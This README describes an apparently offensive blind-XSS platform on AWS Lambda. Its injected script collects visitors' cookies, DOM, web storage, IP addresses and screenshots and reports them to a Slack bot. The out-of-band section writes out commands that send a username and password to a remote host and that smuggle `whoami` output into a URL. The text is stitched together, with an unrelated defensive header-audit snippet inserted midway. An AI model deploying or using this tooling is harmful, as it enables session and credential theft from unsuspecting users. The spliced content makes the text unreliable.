The AWS Lambda Serverless Blind XSS App

Overview

Ass

The AWS Lambda Serverless Blind XSS App

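Setting up an XSS platform on a VPS is too much trouble. With AWS Lambda, all it takes is a domain name: environment setup, HTTPS certificates, privacy, and VPS renewals no longer need any attention. So I rewrote the XSS platform for Lambda, based on xless, and replaced email or SMS alerts with Slack bot notifications.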

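The XSS app exposes four URLs; changing them to different paths when deploying is recommended:

⚠️ Prerequisites

  • An AWS account
  • A Slack account, including a Slack App notification bot and the Auth Token needed to upload images
  • A custom domain (optional)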

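🚀 Deployment

Slack

Create a Slack App, then open the App to obtain the webhook and the Token. The webhook is used to notify the bot; the Token can be an OAuth token starting with xoxb and is used to upload images.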


AWS Lambda

Deploying the Lambda

In app.py, change Token and Bot to your own values:

virtualenv venv -p python3
. venv/bin/activate
sls plugin install -n serverless-wsgi
sls plugin install -n serverless-python-requirements
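sls deploy # deploy to AWS
sls wsgi serve # local testing

Binding a custom domain

First change the NS records at your domain provider so that Route 53 manages the domain. The steps for setting up a custom domain are described in how-to-edge-optimized-custom-domain-name; in summary:

  1. In API Gateway, add a custom domain name, choose Edge-optimized, and in the API mappings select the Lambda function you created
  2. Configure an ACM certificate for the domain
  3. Once configured, you get a domain name of the form *.cloudfront.net
  4. Set up a CNAME alias in Route 53; Cloudflare does not support this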

📨 Collected information

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address
  • Screenshot
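
From the defending side, two items in this list are governed by response headers: cookies set without HttpOnly are readable by script, and a Content-Security-Policy limits where script may be loaded from and where data may be sent. The following is an added example, not code from this project; the helper names and the sample headers are constructed for illustration.

```python
# Added example (not from the project): audit one page's response headers
# for exposure to the items in the "Collected information" list.
WILDCARDS = {"*", "http:", "https:"}

def cookie_is_script_readable(set_cookie):
    """True when a Set-Cookie value lacks the HttpOnly attribute."""
    attrs = [p.strip().lower() for p in set_cookie.split(";")[1:]]
    return "httponly" not in attrs

def parse_csp(value):
    """Map each CSP directive name to its list of source expressions."""
    policy = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            # A directive repeated inside one policy is ignored after the first.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def directive_is_open(policy, directive):
    """True when a fetch directive (or its default-src fallback) allows any host."""
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True  # nothing restricts this resource type
    loose = WILDCARDS | ({"'unsafe-inline'"} if directive == "script-src" else set())
    return any(s.lower() in loose for s in sources)

def audit(headers):
    """headers: (name, value) pairs of one response. Assumes a single CSP header."""
    policy, readable = {}, []
    for name, value in headers:
        if name.lower() == "set-cookie" and cookie_is_script_readable(value):
            readable.append(value.split("=", 1)[0].strip())
        elif name.lower() == "content-security-policy":
            policy = parse_csp(value)
    return {
        "cookies_readable_by_script": readable,
        "open_directives": [d for d in ("script-src", "connect-src", "img-src")
                            if directive_is_open(policy, d)],
    }

# Constructed sample: one unprotected cookie, and a CSP that pins scripts and
# XHR/fetch to the page's own origin but leaves image requests unrestricted.
SAMPLE = [
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "prefs=dark; Path=/"),
    ("Content-Security-Policy", "script-src 'self'; connect-src 'self'; img-src *"),
]

if __name__ == "__main__":
    print(audit(SAMPLE))
```

LocalStorage, SessionStorage and the DOM have no per-item flag comparable to HttpOnly, so for those the script-src result is the relevant control.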


📡 Out-of-Band (OOB)

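OOB scenario 1

JS inserted into a site collects sensitive information and sends it to the remote server; note that the data must be in JSON format: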

http https://example.com/msg "UserName=admin" "Password=admin"  -v


OOB scenario 2

Command execution output sent out-of-band to a remote HTTP service:

http https://example.com/404/`whoami`


TODO

  • Every time the JS needs to change, the Lambda has to be redeployed
Owner
cocokey